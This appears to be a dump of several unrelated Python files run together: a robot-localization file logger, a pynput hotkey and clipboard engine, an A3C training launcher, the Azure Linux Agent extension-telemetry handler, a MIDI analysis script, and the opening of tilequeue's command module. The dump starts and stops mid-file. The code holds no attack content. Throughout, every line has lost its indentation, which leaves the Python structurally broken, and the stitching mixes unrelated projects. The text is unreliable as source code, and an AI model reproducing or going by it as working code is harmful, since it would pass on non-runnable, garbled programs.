self.f.write(str(posicion[0][0])+" "+str(posicion[1][0])+" "+str(posicion[2][0])+" "+str(posicion[3][0])+" ")
elif l == "localizacion_probabilistica":
if ("mapa" in kwargs) and ("rox" in kwargs) and ("roy" in kwargs) and ("rotheta" in kwargs) and ("Rk" in kwargs):
mu, sigma = self.localizacion_probabilistica(kwargs["mapa"], kwargs["rox"], kwargs["roy"], kwargs["rotheta"], kwargs["Rk"])
self.f.write(str(mu[0][0])+" "+str(mu[1][0])+" "+str(mu[2][0])+" "+str(sigma[0][0])+" "+str(sigma[0][1])+" "+str(sigma[0][2])+" "+str(sigma[1][0])+" "+str(sigma[1][1])+" "+str(sigma[1][2])+" "+str(sigma[2][0])+" "+str(sigma[2][1])+" "+str(sigma[2][2])+" ")
self.f.write("\n")
sleep(tiempo)
self.t.stop()
self.fin_escribir_fichero = True
self.f = open(nombre_fichero,"w")
self.escribir_fichero_activo = True
self.fin_escribir_fichero = False
self.id_hilo_fichero = Thread(target = hilo_fichero)
self.id_hilo_fichero.start()
def parar_fichero(self):
self.escribir_fichero_activo = False
if not self.fin_escribir_fichero:
self.id_hilo_fichero.join(timeout=None)
self.f.close()
|
engine.py
|
# =======================================================================================
# \ | | __ __| _ \ | / __| \ \ / __|
# _ \ | | | ( | . < _| \ / \__ \
# @autor: Luis Monteiro _/ _\ \__/ _| \___/ _|\_\ ___| _| ____/
# =======================================================================================
from pynput import keyboard
from multiprocessing import Process
from pyperclip import copy, paste
from time import time
# =======================================================================================
# Helpers
# =======================================================================================
def is_equal(seq1, seq2):
return list(seq1) == list(seq2)
def is_subset(sub, seq):
return all(map(lambda p: p in seq, sub))
def is_subseq(sub, seq):
return len(sub) <= len(seq) and all(map(lambda x, y: x==y, sub, seq))
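# Quick illustration of the helpers above:
#   is_subset([1, 2], [2, 3, 1])  -> True   (containment, order-insensitive)
#   is_subseq([1, 2], [1, 2, 3])  -> True   (element-wise prefix match)
#   is_subseq([2, 3], [1, 2, 3])  -> False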
# =======================================================================================
# Clipboard
# =======================================================================================
class MyException(Exception): pass
class Clipboard:
@classmethod
def Stage(cls, text):
Process(target=cls.Revert, args=(paste(),), daemon=True).start()
copy(text)
@classmethod
def Revert(cls, text):
def on_release(key):
copy(text)
exit(0)
# start listener
with keyboard.Listener(on_release=on_release) as listener:
listener.join()
# =======================================================================================
# Keyboard
# =======================================================================================
class Keyboard:
_controler = keyboard.Controller()
@classmethod
def Type(cls, text=None, backoff=0, enter=False):
for _ in range(backoff):
cls.click(keyboard.Key.backspace)
if text:
cls._controler.type(text)
if enter:
cls.click(keyboard.Key.enter)
@classmethod
def click(cls, key):
cls._controler.press(key)
cls._controler.release(key)
# Public Keys
SHIFT = keyboard.Key.shift
CTRL = keyboard.Key.ctrl
ALT = keyboard.Key.alt
CMD = keyboard.Key.cmd
KEY = lambda x : keyboard.KeyCode(char=x)
# =======================================================================================
# Keys
# =======================================================================================
class Keys:
def __init__(self, *args):
self._keys = tuple(args)
def __len__(self):
return len(self._keys)
def press(self, key, char): pass
def release(self, key, char): pass
def reset(self): pass
# =======================================================================================
# HotKeys
# =======================================================================================
class HotKeys(Keys):
MAX_LIVES = 5
def __init__(self, *args):
super().__init__(*args)
self.reset()
def press(self, key, _):
if key not in self._press:
self._press.append(key)
if not is_subset(self._press, self._keys):
self._active = False
self._lives -= 1
return
if not is_subset(self._keys, self._press):
self._active = None
return
self._active = True
def release(self, key, _):
self._press = list(filter(lambda k: k!=key, self._press))
if not self._press or not self._lives:
return self._active
def reset(self):
self._press = []
self._active = None
self._lives = self.MAX_LIVES
# =======================================================================================
# SeqKeys
# =======================================================================================
class SeqKeys(Keys):
def __init__(self, *args):
super().__init__(*args)
self.reset()
def press(self, key, char):
if key not in self._press:
self._press.append(key)
self._chars.append(char)
if not is_subseq(self._chars, self._keys):
self._active = False
return
if not is_subseq(self._keys, self._chars):
self._active = None
return
self._active = True
def release(self, key, _):
self._press = list(filter(lambda k: k!=key, self._press))
return self._active
def reset(self):
self._press = []
self._chars = []
self._active = None
# =======================================================================================
# KeyPatterns
# =======================================================================================
class KeyPatterns(keyboard.Listener):
# ---------------------------------------------------------------
# helper
# ---------------------------------------------------------------
class Stack:
def __init__(self, init):
self._stack = [init]
def add(self, obj):
self._stack.append(obj)
def get(self):
return self._stack[-1]
def clr(self):
for step in reversed(self._stack):
for obj in step:
obj.reset()
self._stack = self._stack[:1]
# ---------------------------------------------------------------
# interfaces
# ---------------------------------------------------------------
def __init__(self, config):
super().__init__(
on_press = self._on_press,
on_release = self._on_release)
self._space = config
self._stack = self.Stack(config)
self._board = keyboard.Controller()
def _on_press(self, key):
for comb in self._stack.get():
comb.press(self.canonical(key), key)
def _on_release(self, key):
active = {}
enable = {}
disable = {}
for comb, children in self._stack.get().items():
{
True : enable,
False : disable,
None : active
}[comb.release(self.canonical(key), key)][comb] = children
# move point
if enable:
next = {}
for parent, obj in enable.items():
if callable(obj):
obj(parent)
continue
next.update(obj)
if next:
self._stack.add(next)
else:
self._stack.clr()
return
# do nothing when some are active
if active: return
# reset the stack when all are disabled
if disable: self._stack.clr()
def _reset(self):
# Reset every tracked pattern and return to the root of the pattern space.
# Delegate to Stack.clr(): iterating or reassigning self._stack directly
# would bypass the Stack wrapper used everywhere else.
self._stack.clr()
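# Sketch of a configuration accepted by KeyPatterns, inferred from _on_release:
# dict values are either nested dicts of follow-up Keys or callables fired on a
# match (callables receive the matched Keys object; the callback name below is
# hypothetical):
#
#   config = {
#       HotKeys(Keyboard.CTRL, Keyboard.ALT): {
#           SeqKeys(Keyboard.KEY('a'), Keyboard.KEY('b')): on_match,
#       },
#   }
#   KeyPatterns(config).start()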
|
main.py
|
import logging
import os
import torch
import torch.multiprocessing as mp
import optimizer as my_optim
from config import Params
from envs import create_expansionai_env
from model import ActorCritic
from test import test
from train import train
LOGGING_FORMAT = '%(asctime)s - %(name)s - %(thread)d|%(process)d - %(levelname)s - %(message)s'
logging.basicConfig(format=LOGGING_FORMAT)
# logging.getLogger('Model').setLevel(logging.INFO)
# logging.getLogger('ExpansionAiEnv').setLevel(logging.DEBUG)
logging.getLogger('Train').setLevel(logging.INFO)
logging.getLogger('Test').setLevel(logging.INFO)
# Main run
os.environ['OMP_NUM_THREADS'] = '1' # limit each worker process to a single OpenMP thread
params = Params() # creating the params object from the Params class, that sets all the model parameters
params.max_episode_length = 1_000_000
params.num_processes = 3
torch.manual_seed(params.seed) # setting the seed (not essential)
env = create_expansionai_env(params.env_name, params) # create the ExpansionAI environment from the configured environment name
# shared_model is the model shared by the different agents (separate processes, possibly on different cores)
shared_model = ActorCritic(env.observation_space.shape[0], env.action_space)
# place the model in shared memory so every training process can read and update the same parameters
shared_model.share_memory()
# the optimizer is also shared because it acts on the shared model
optimizer = my_optim.SharedAdam(shared_model.parameters(), lr=params.lr)
optimizer.share_memory() # likewise, keep the optimizer state in shared memory so all agents optimize the same model
processes = [] # list that will hold all worker processes
# spawn the training processes; each one updates the shared model
for rank in range(0, params.num_processes):
p = mp.Process(target=train, args=(rank, params, shared_model, optimizer))
p.start()
processes.append(p)
# create the 'test' process: it evaluates the shared model without updating it; torch.multiprocessing.Process runs the target function in an independent process
p = mp.Process(target=test, args=(params.num_processes, params, shared_model))
p.start() # start the created process p
processes.append(p) # add the created process p to the list of processes
# wait for every process to finish so the program can exit cleanly
for p in processes:
p.join()
|
extension_telemetry.py
|
# Microsoft Azure Linux Agent
#
# Copyright 2020 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import datetime
import json
import os
import re
import threading
from collections import defaultdict
import azurelinuxagent.common.logger as logger
from azurelinuxagent.common import conf
from azurelinuxagent.common.event import EVENTS_DIRECTORY, TELEMETRY_LOG_EVENT_ID, \
TELEMETRY_LOG_PROVIDER_ID, add_event, WALAEventOperation, add_log_event, get_event_logger
from azurelinuxagent.common.exception import InvalidExtensionEventError
from azurelinuxagent.common.future import ustr
from azurelinuxagent.common.interfaces import ThreadHandlerInterface
from azurelinuxagent.common.telemetryevent import TelemetryEventList, TelemetryEvent, TelemetryEventParam, \
GuestAgentGenericLogsSchema
from azurelinuxagent.ga.exthandlers import HANDLER_NAME_PATTERN
from azurelinuxagent.ga.periodic_operation import PeriodicOperation
def get_extension_telemetry_handler(protocol_util):
return ExtensionTelemetryHandler(protocol_util)
class ExtensionEventSchema(object): # pylint: disable=R0903
"""
Class for defining the schema for Extension Events.
"""
Version = "Version"
Timestamp = "Timestamp"
TaskName = "TaskName"
EventLevel = "EventLevel"
Message = "Message"
EventPid = "EventPid"
EventTid = "EventTid"
OperationId = "OperationId"
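# Illustrative example of a single event conforming to this schema (all values
# are made up):
#
#   {
#       "Version": "1.0.0",
#       "Timestamp": "2020-01-01T00:00:00.000Z",
#       "TaskName": "Enable",
#       "EventLevel": "Informational",
#       "Message": "Extension enabled successfully",
#       "EventPid": "1234",
#       "EventTid": "1",
#       "OperationId": "00000000-0000-0000-0000-000000000000"
#   }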
class ProcessExtensionTelemetry(PeriodicOperation):
"""
Periodic operation for collecting and sending extension telemetry events to Wireserver.
"""
_EXTENSION_EVENT_COLLECTION_PERIOD = datetime.timedelta(minutes=5)
_EXTENSION_EVENT_FILE_NAME_REGEX = re.compile(r"^(\d+)\.json$", re.IGNORECASE)
# Limits
_MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD = 300
_EXTENSION_EVENT_FILE_MAX_SIZE = 4 * 1024 * 1024 # 4 MB = 4 * 1,048,576 Bytes
_EXTENSION_EVENT_MAX_SIZE = 1024 * 6 # 6Kb or 6144 characters. Limit for the whole event. Prevent oversized events.
_EXTENSION_EVENT_MAX_MSG_LEN = 1024 * 3 # 3Kb or 3072 chars.
_EXTENSION_EVENT_REQUIRED_FIELDS = [attr.lower() for attr in dir(ExtensionEventSchema) if
not callable(getattr(ExtensionEventSchema, attr)) and not attr.startswith("__")]
def __init__(self, protocol_util):
super(ProcessExtensionTelemetry, self).__init__(
name="collect and send extension events",
operation=self._collect_and_send_events,
period=ProcessExtensionTelemetry._EXTENSION_EVENT_COLLECTION_PERIOD)
self._protocol = protocol_util.get_protocol()
def _collect_and_send_events(self):
event_list = self._collect_extension_events()
if len(event_list.events) > 0: # pylint: disable=C1801
self._protocol.report_event(event_list)
def _collect_extension_events(self):
events_list = TelemetryEventList()
extension_handler_with_event_dirs = []
try:
extension_handler_with_event_dirs = self._get_extension_events_dir_with_handler_name(conf.get_ext_log_dir())
if len(extension_handler_with_event_dirs) == 0: # pylint: disable=C1801
logger.verbose("No Extension events directory exist")
return events_list
for extension_handler_with_event_dir in extension_handler_with_event_dirs:
handler_name = extension_handler_with_event_dir[0]
handler_event_dir_path = extension_handler_with_event_dir[1]
self._capture_extension_events(handler_name, handler_event_dir_path, events_list)
except Exception as e: # pylint: disable=C0103
msg = "Unknown error occurred when trying to collect extension events. Error: {0}".format(ustr(e))
add_event(op=WALAEventOperation.ExtensionTelemetryEventProcessing, message=msg, is_success=False)
finally:
# Always ensure that the events directories are emptied each run,
# even if we run into an error and don't process them this run.
self._ensure_all_events_directories_empty(extension_handler_with_event_dirs)
return events_list
@staticmethod
def _get_extension_events_dir_with_handler_name(extension_log_dir):
"""
Get the full path to events directory for all extension handlers that have one
:param extension_log_dir: Base log directory for all extensions
:return: A list of full paths of existing events directory for all handlers
"""
extension_handler_with_event_dirs = []
for ext_handler_name in os.listdir(extension_log_dir):
# Check if it's an extension directory
if not os.path.isdir(os.path.join(extension_log_dir, ext_handler_name)) \
or re.match(HANDLER_NAME_PATTERN, ext_handler_name) is None:
continue
# Check if EVENTS_DIRECTORY directory exists
extension_event_dir = os.path.join(extension_log_dir, ext_handler_name, EVENTS_DIRECTORY)
if os.path.exists(extension_event_dir):
extension_handler_with_event_dirs.append((ext_handler_name, extension_event_dir))
return extension_handler_with_event_dirs
def _capture_extension_events(self, handler_name, handler_event_dir_path, events_list):
"""
Capture Extension events and add them to the events_list
:param handler_name: Complete Handler Name. Eg: Microsoft.CPlat.Core.RunCommandLinux
:param handler_event_dir_path: Full path. Eg: '/var/log/azure/Microsoft.CPlat.Core.RunCommandLinux/events'
:param events_list: List of captured extension events
"""
convert_to_mb = lambda x: (1.0 * x)/(1000 * 1000)
# Filter out the files that do not follow the pre-defined EXTENSION_EVENT_FILE_NAME_REGEX
event_files = [event_file for event_file in os.listdir(handler_event_dir_path) if
re.match(self._EXTENSION_EVENT_FILE_NAME_REGEX, event_file) is not None]
# Pick the latest files first, we'll discard older events if len(events) > MAX_EVENT_COUNT
event_files.sort(reverse=True)
captured_extension_events_count = 0
dropped_events_with_error_count = defaultdict(int)
for event_file in event_files:
event_file_path = os.path.join(handler_event_dir_path, event_file)
try:
logger.verbose("Processing event file: {0}", event_file_path)
# We only support _EXTENSION_EVENT_FILE_MAX_SIZE=4Mb max file size
event_file_size = os.stat(event_file_path).st_size
if event_file_size > self._EXTENSION_EVENT_FILE_MAX_SIZE:
msg = "Skipping file: {0} as its size is {1:.2f} Mb > Max size allowed {2:.1f} Mb".format(
event_file_path, convert_to_mb(event_file_size),
convert_to_mb(self._EXTENSION_EVENT_FILE_MAX_SIZE))
logger.warn(msg)
add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
continue
# We support multiple events in a file, read the file and parse events.
parsed_events = self._parse_event_file_and_capture_events(handler_name, event_file_path,
captured_extension_events_count,
dropped_events_with_error_count)
events_list.events.extend(parsed_events)
captured_extension_events_count += len(parsed_events)
# We only allow MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD=300 maximum events per period per handler
if captured_extension_events_count >= self._MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD:
msg = "Reached max count for the extension: {0}; Max Limit: {1}. Skipping the rest.".format(
handler_name, self._MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD)
logger.warn(msg)
add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
break
except Exception as e: # pylint: disable=C0103
msg = "Failed to process event file {0}: {1}", event_file, ustr(e)
logger.warn(msg)
add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
finally:
os.remove(event_file_path)
if dropped_events_with_error_count is not None and len(dropped_events_with_error_count) > 0: # pylint: disable=C1801
msg = "Dropped events for Extension: {0}; Details:\n\t{1}".format(handler_name, '\n\t'.join(
["Reason: {0}; Dropped Count: {1}".format(k, v) for k, v in dropped_events_with_error_count.items()]))
logger.warn(msg)
add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
if captured_extension_events_count > 0:
logger.info("Collected {0} events for extension: {1}".format(captured_extension_events_count, handler_name))
@staticmethod
def _ensure_all_events_directories_empty(extension_events_directories):
if len(extension_events_directories) == 0: # pylint: disable=C1801
return
for extension_handler_with_event_dir in extension_events_directories:
event_dir_path = extension_handler_with_event_dir[1]
if not os.path.exists(event_dir_path):
return
err = None
# Delete any residue files in the events directory
for residue_file in os.listdir(event_dir_path):
try:
os.remove(os.path.join(event_dir_path, residue_file))
except Exception as e: # pylint: disable=C0103
# Only log the first error once per handler per run if unable to clean off residue files
err = ustr(e) if err is None else err
if err is not None:
logger.error("Failed to completely clear the {0} directory. Exception: {1}", event_dir_path, err)
def _parse_event_file_and_capture_events(self, handler_name, event_file_path, captured_events_count,
dropped_events_with_error_count):
events_list = []
event_file_time = datetime.datetime.fromtimestamp(os.path.getmtime(event_file_path))
# Read event file and decode it properly
with open(event_file_path, "rb") as fd: # pylint: disable=C0103
event_data = fd.read().decode("utf-8")
# Parse the string and get the list of events
events = json.loads(event_data)
# We allow multiple events in a file but there can be an instance where the file only has a single
# JSON event and not a list. Handling that condition too
if not isinstance(events, list):
events = [events]
for event in events:
try:
events_list.append(self._parse_telemetry_event(handler_name, event, event_file_time))
captured_events_count += 1
except InvalidExtensionEventError as e: # pylint: disable=C0103
# These are the errors thrown if there's an error parsing the event. We want to report these back to the
# extension publishers so that they are aware of the issues.
# The error messages are all static messages, we will use this to create a dict and emit an event at the
# end of each run to notify if there were any errors parsing events for the extension
dropped_events_with_error_count[ustr(e)] += 1
except Exception as e: # pylint: disable=C0103
logger.warn("Unable to parse and transmit event, error: {0}".format(e))
if captured_events_count >= self._MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD:
break
return events_list
def _parse_telemetry_event(self, handler_name, extension_unparsed_event, event_file_time):
"""
Parse the Json event file and convert it to TelemetryEvent object with the required data.
:return: Complete TelemetryEvent with all required fields filled up properly. Raises if event breaches contract.
"""
extension_event = self._parse_event_and_ensure_it_is_valid(extension_unparsed_event)
# Create a telemetry event, add all common parameters to the event
# and then overwrite all the common params with extension events params if same
event = TelemetryEvent(TELEMETRY_LOG_EVENT_ID, TELEMETRY_LOG_PROVIDER_ID)
event.file_type = "json"
self.add_common_params_to_extension_event(event, event_file_time)
replace_or_add_params = {
GuestAgentGenericLogsSchema.EventName: "{0}-{1}".format(handler_name, extension_event[
ExtensionEventSchema.Version.lower()]),
GuestAgentGenericLogsSchema.CapabilityUsed: extension_event[ExtensionEventSchema.EventLevel.lower()],
GuestAgentGenericLogsSchema.TaskName: extension_event[ExtensionEventSchema.TaskName.lower()],
GuestAgentGenericLogsSchema.Context1: extension_event[ExtensionEventSchema.Message.lower()],
GuestAgentGenericLogsSchema.Context2: extension_event[ExtensionEventSchema.Timestamp.lower()],
GuestAgentGenericLogsSchema.Context3: extension_event[ExtensionEventSchema.OperationId.lower()],
GuestAgentGenericLogsSchema.EventPid: extension_event[ExtensionEventSchema.EventPid.lower()],
GuestAgentGenericLogsSchema.EventTid: extension_event[ExtensionEventSchema.EventTid.lower()]
}
self._replace_or_add_param_in_event(event, replace_or_add_params)
return event
def _parse_event_and_ensure_it_is_valid(self, extension_event):
"""
Parse the Json event from file. Raise InvalidExtensionEventError if the event breaches pre-set contract.
:param extension_event: The json event from file
:return: Verified Json event that qualifies the contract.
"""
clean_string = lambda x: x.strip() if x is not None else x
event_size = 0
key_err_msg = "{0}: {1} not found"
# Convert the dict to all lower keys to avoid schema confusion.
# Only pick the params that we care about and skip the rest.
event = dict((k.lower(), clean_string(v)) for k, v in extension_event.items() if
k.lower() in self._EXTENSION_EVENT_REQUIRED_FIELDS)
# Trim message and only pick the first 3k chars
message_key = ExtensionEventSchema.Message.lower()
if message_key in event:
event[message_key] = event[message_key][:self._EXTENSION_EVENT_MAX_MSG_LEN]
else:
raise InvalidExtensionEventError(
key_err_msg.format(InvalidExtensionEventError.MissingKeyError, ExtensionEventSchema.Message))
if event[message_key] is None or len(event[message_key]) == 0: # pylint: disable=C1801
raise InvalidExtensionEventError(
"{0}: {1} should not be empty".format(InvalidExtensionEventError.EmptyMessageError,
ExtensionEventSchema.Message))
for required_key in self._EXTENSION_EVENT_REQUIRED_FIELDS:
# If all required keys not in event then raise
if not required_key in event:
raise InvalidExtensionEventError(
key_err_msg.format(InvalidExtensionEventError.MissingKeyError, required_key))
# If the event_size > _EXTENSION_EVENT_MAX_SIZE=6k, then raise
if event_size > self._EXTENSION_EVENT_MAX_SIZE:
raise InvalidExtensionEventError(
"{0}: max event size allowed: {1}".format(InvalidExtensionEventError.OversizeEventError,
self._EXTENSION_EVENT_MAX_SIZE))
event_size += len(event[required_key])
return event
@staticmethod
def _replace_or_add_param_in_event(event, replace_or_add_params):
for param in event.parameters:
if param.name in replace_or_add_params:
param.value = replace_or_add_params.pop(param.name)
if not replace_or_add_params:
# All values replaced, return
return
# Add the remaining params to the event
for param_name in replace_or_add_params:
event.parameters.append(TelemetryEventParam(param_name, replace_or_add_params[param_name]))
@staticmethod
def add_common_params_to_extension_event(event, event_time):
reporter = get_event_logger()
reporter.add_common_event_parameters(event, event_time)
class ExtensionTelemetryHandler(ThreadHandlerInterface):
"""
This handler takes care of fetching the extension telemetry events from the
{extension_events_dir} and sending them to Kusto for advanced debuggability.
"""
_THREAD_NAME = "ExtensionTelemetryHandler"
def __init__(self, protocol_util):
self.protocol_util = protocol_util
self.should_run = True
self.thread = None
@staticmethod
def get_thread_name():
return ExtensionTelemetryHandler._THREAD_NAME
def run(self):
logger.info("Start Extension Telemetry service.")
self.start()
def is_alive(self):
return self.thread is not None and self.thread.is_alive()
def start(self):
self.thread = threading.Thread(target=self.daemon)
self.thread.setDaemon(True)
self.thread.setName(ExtensionTelemetryHandler.get_thread_name())
self.thread.start()
def stop(self):
"""
Stop server communication and join the thread to main thread.
"""
self.should_run = False
if self.is_alive():
self.thread.join()
def stopped(self):
return not self.should_run
def daemon(self):
op = ProcessExtensionTelemetry(self.protocol_util) # pylint: disable=C0103
logger.info("Successfully started the {0} thread".format(self.get_thread_name()))
while not self.stopped():
try:
op.run()
except Exception as e: # pylint: disable=C0103
logger.warn(
"An error occurred in the Telemetry Extension thread main loop; will skip the current iteration.\n{0}",
ustr(e))
finally:
PeriodicOperation.sleep_until_next_operation([op])
|
Midi_Analyzer.py
|
from Scripts import Scale
import time
import threading
import mido
from mido import MidiFile, MidiTrack
# https://mido.readthedocs.io/en/latest/midi_files.html
# http://support.ircam.fr/docs/om/om6-manual/co/MIDI-Concepts.html
tracks = []
def print_ports():
# for potential sound generation...
# nonfunctional
inports = mido.get_input_names()
outports = mido.get_output_names()
for i, p in enumerate(inports):
print(f'Inport: {i} {p}')
for i, p in enumerate(outports):
print(f'Outport: {i} {p}')
def print_notes():
for msg in midi_file:
try:
print(f'Channel: {msg.channel} - {msg.type} - Note: {msg.note}({Scale.get_note_name(msg.note)}{msg.note//12 - 1}) - Vol: {msg.velocity} - Time: {msg.time}')
except Exception:
pass # meta messages have no channel/note/velocity attributes
def print_messages():
for msg in midi_file:
print(msg)
def print_meta_messages():
for msg in midi_file:
if msg.is_meta:
print(msg)
def play_midi(m):
    # Iterating a MidiFile yields messages with `time` already in seconds.
    print(f'Loading {m}...')
    for msg in m:
        time.sleep(msg.time)
        print(msg)
def set_tracks():
print(f'Tracks: {len(midi_file.tracks)}')
for track in midi_file.tracks:
print(track.name)
tracks.append(track)
def print_tracks():
for track in tracks:
print(track.name)
for msg in track:
print(f'{track.name} - {msg}')
def print_tracks_info():
print(f'Tracks: {len(tracks)}')
for track in tracks:
print(track.name)
def play_track(track):
    # Track messages carry delta times in ticks rather than seconds, so
    # convert before sleeping (assumes the default tempo of 500000 us/beat).
    for msg in track:
        print(msg)
        time.sleep(mido.tick2second(msg.time, midi_file.ticks_per_beat, 500000))
def play_tracks():
    # Play all tracks concurrently, one thread per track.
    threads = [threading.Thread(target=play_track, args=(t,)) for t in tracks]
    for thrd in threads:
        thrd.start()
    for thrd in threads:
        thrd.join()
def get_max_channel():
    max_channel = -1
    for msg in midi_file:
        # Meta messages have no channel attribute, so skip them.
        try:
            if msg.channel > max_channel:
                max_channel = msg.channel
        except AttributeError:
            continue
    return max_channel
def copy_note(item, n, velocity, length):
    # Assumes `item` is a mido Message; copy() applies attribute overrides.
    return item.copy(note=n, velocity=velocity, time=length)
def copy_file(file):
mid = MidiFile()
for i, track in enumerate(file.tracks):
mid.tracks.append(MidiTrack())
for msg in track:
if msg.type == 'note_on' or msg.type == 'note_off' or msg.type == 'program_change':
mid.tracks[i].append(msg.copy())
filename = '../generated.mid'
mid.save(filename)
return filename
file_name = '../../Example MIDI Files/Mario_something.mid'
midi_file = MidiFile(file_name)
print_messages()
|
command.py
|
from __future__ import absolute_import
from collections import defaultdict
from collections import namedtuple
from contextlib import closing
from itertools import chain
from ModestMaps.Core import Coordinate
from multiprocessing.pool import ThreadPool
from random import randrange
from tilequeue.config import create_query_bounds_pad_fn
from tilequeue.config import make_config_from_argparse
from tilequeue.format import lookup_format_by_extension
from tilequeue.metro_extract import city_bounds
from tilequeue.metro_extract import parse_metro_extract
from tilequeue.process import process
from tilequeue.process import Processor
from tilequeue.query import DBConnectionPool
from tilequeue.query import make_data_fetcher
from tilequeue.queue import make_sqs_queue
from tilequeue.queue import make_visibility_manager
from tilequeue.store import make_store
from tilequeue.tile import coord_children_range
from tilequeue.tile import coord_int_zoom_up
from tilequeue.tile import coord_is_valid
from tilequeue.tile import coord_marshall_int
from tilequeue.tile import coord_unmarshall_int
from tilequeue.tile import create_coord
from tilequeue.tile import deserialize_coord
from tilequeue.tile import metatile_zoom_from_str
from tilequeue.tile import seed_tiles
from tilequeue.tile import serialize_coord
from tilequeue.tile import tile_generator_for_multiple_bounds
from tilequeue.tile import tile_generator_for_range
from tilequeue.tile import tile_generator_for_single_bounds
from tilequeue.tile import zoom_mask
from tilequeue.toi import load_set_from_fp
from tilequeue.toi import save_set_to_fp
from tilequeue.top_tiles import parse_top_tiles
from tilequeue.utils import grouper
from tilequeue.utils import parse_log_file
from tilequeue.utils import time_block
from tilequeue.utils import AwsSessionHelper
from tilequeue.worker import DataFetch
from tilequeue.worker import ProcessAndFormatData
from tilequeue.worker import QueuePrint
from tilequeue.worker import S3Storage
from tilequeue.worker import TileQueueReader
from tilequeue.worker import TileQueueWriter
from urllib2 import urlopen
from zope.dottedname.resolve import resolve
import argparse
import datetime
import logging
import logging.config
import multiprocessing
import operator
import os
import os.path
import Queue
import signal
import sys
import threading
import time
import traceback
import yaml
def create_coords_generator_from_tiles_file(fp, logger=None):
for line in fp:
line = line.strip()
if not line:
continue
coord = deserialize_coord(line)
if coord is None:
if logger is not None:
                logger.warning('Could not parse coordinate from line: %s' % line)
continue
yield coord
def lookup_formats(format_extensions):
formats = []
for extension in format_extensions:
format = lookup_format_by_extension(extension)
assert format is not None, 'Unknown extension: %s' % extension
formats.append(format)
return formats
def uniquify_generator(generator):
s = set(generator)
for tile in s:
yield tile
class GetSqsQueueNameForZoom(object):
def __init__(self, zoom_queue_table):
self.zoom_queue_table = zoom_queue_table
def __call__(self, zoom):
assert isinstance(zoom, (int, long))
assert 0 <= zoom <= 20
result = self.zoom_queue_table.get(zoom)
assert result is not None, 'No queue name found for zoom: %d' % zoom
return result
def make_get_queue_name_for_zoom(zoom_queue_map_cfg, queue_names):
zoom_to_queue_name_table = {}
for zoom_range, queue_name in zoom_queue_map_cfg.items():
assert queue_name in queue_names
assert '-' in zoom_range, 'Invalid zoom range: %s' % zoom_range
zoom_fields = zoom_range.split('-')
assert len(zoom_fields) == 2, 'Invalid zoom range: %s' % zoom_range
zoom_start_str, zoom_until_str = zoom_fields
try:
zoom_start = int(zoom_start_str)
zoom_until = int(zoom_until_str)
except (ValueError, KeyError):
            assert False, 'Invalid zoom range: %s' % zoom_range
assert (0 <= zoom_start <= 20 and
0 <= zoom_until <= 20 and
zoom_start <= zoom_until), \
'Invalid zoom range: %s' % zoom_range
for i in range(zoom_start, zoom_until + 1):
assert i not in zoom_to_queue_name_table, \
'Overlapping zoom range: %s' % zoom_range
zoom_to_queue_name_table[i] = queue_name
result = GetSqsQueueNameForZoom(zoom_to_queue_name_table)
return result
def make_queue_mapper(queue_mapper_yaml, tile_queue_name_map, toi):
queue_mapper_type = queue_mapper_yaml.get('type')
assert queue_mapper_type, 'Missing queue mapper type'
if queue_mapper_type == 'single':
queue_name = queue_mapper_yaml.get('name')
assert queue_name, 'Missing queue name in queue mapper config'
tile_queue = tile_queue_name_map.get(queue_name)
assert tile_queue, 'No queue found in mapping for %s' % queue_name
return make_single_queue_mapper(queue_name, tile_queue)
elif queue_mapper_type == 'multiple':
multi_queue_map_yaml = queue_mapper_yaml.get('multiple')
assert multi_queue_map_yaml, \
'Missing yaml config for multiple queue mapper'
assert isinstance(multi_queue_map_yaml, list), \
        'Multiple queue mapper config should be a list'
return make_multi_queue_group_mapper_from_cfg(
multi_queue_map_yaml, tile_queue_name_map, toi)
else:
assert 0, 'Unknown queue mapper type: %s' % queue_mapper_type
def make_multi_queue_group_mapper_from_cfg(
multi_queue_map_yaml, tile_queue_name_map, toi):
from tilequeue.queue.mapper import ZoomRangeAndZoomGroupQueueMapper
from tilequeue.queue.mapper import ZoomRangeQueueSpec
zoom_range_specs = []
for zoom_range_spec_yaml in multi_queue_map_yaml:
start_zoom = zoom_range_spec_yaml.get('start-zoom')
end_zoom = zoom_range_spec_yaml.get('end-zoom')
if start_zoom is not None and end_zoom is not None:
assert isinstance(start_zoom, int)
assert isinstance(end_zoom, int)
assert start_zoom < end_zoom
else:
start_zoom = None
end_zoom = None
queue_name = zoom_range_spec_yaml['queue-name']
queue = tile_queue_name_map[queue_name]
group_by_zoom = zoom_range_spec_yaml.get('group-by-zoom')
in_toi = zoom_range_spec_yaml.get('in_toi')
assert group_by_zoom is None or isinstance(group_by_zoom, int)
zrs = ZoomRangeQueueSpec(
start_zoom, end_zoom, queue_name, queue, group_by_zoom,
in_toi)
zoom_range_specs.append(zrs)
queue_mapper = ZoomRangeAndZoomGroupQueueMapper(
zoom_range_specs, toi=toi)
return queue_mapper
def make_single_queue_mapper(queue_name, tile_queue):
from tilequeue.queue.mapper import SingleQueueMapper
queue_mapper = SingleQueueMapper(queue_name, tile_queue)
return queue_mapper
def make_message_marshaller(msg_marshall_yaml_cfg):
msg_mar_type = msg_marshall_yaml_cfg.get('type')
assert msg_mar_type, 'Missing message marshall type in config'
if msg_mar_type == 'single':
from tilequeue.queue.message import SingleMessageMarshaller
return SingleMessageMarshaller()
elif msg_mar_type == 'multiple':
from tilequeue.queue.message import CommaSeparatedMarshaller
return CommaSeparatedMarshaller()
else:
assert 0, 'Unknown message marshall type: %s' % msg_mar_type
def make_inflight_manager(inflight_yaml, redis_client=None):
